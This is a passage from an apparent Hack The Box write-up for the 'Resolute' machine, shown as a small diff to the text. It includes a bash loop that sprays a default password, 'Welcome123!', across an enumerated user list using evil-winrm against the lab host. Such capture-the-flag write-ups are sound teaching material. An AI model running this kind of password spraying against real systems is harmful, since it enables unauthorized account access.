yaboygmoney/HackTheBoxWriteups/resolute.md

 ![](https://yaboygmoney.github.io/htb/images/resolute/badpass.png)

 Looks like the password won't work for ```marko```.
 It does appear to be a standard "Welcome to the organization!" password that is set by default.
-To check it against the user list provided by enum4linux, I ran
+To check it against the user list named "u.txt" containing all of the names provided by enum4linux, I ran

 ```bash
 for user in $(cat u.txt); do evil-winrm -u $user -p 'Welcome123!' -i resolute.htb; done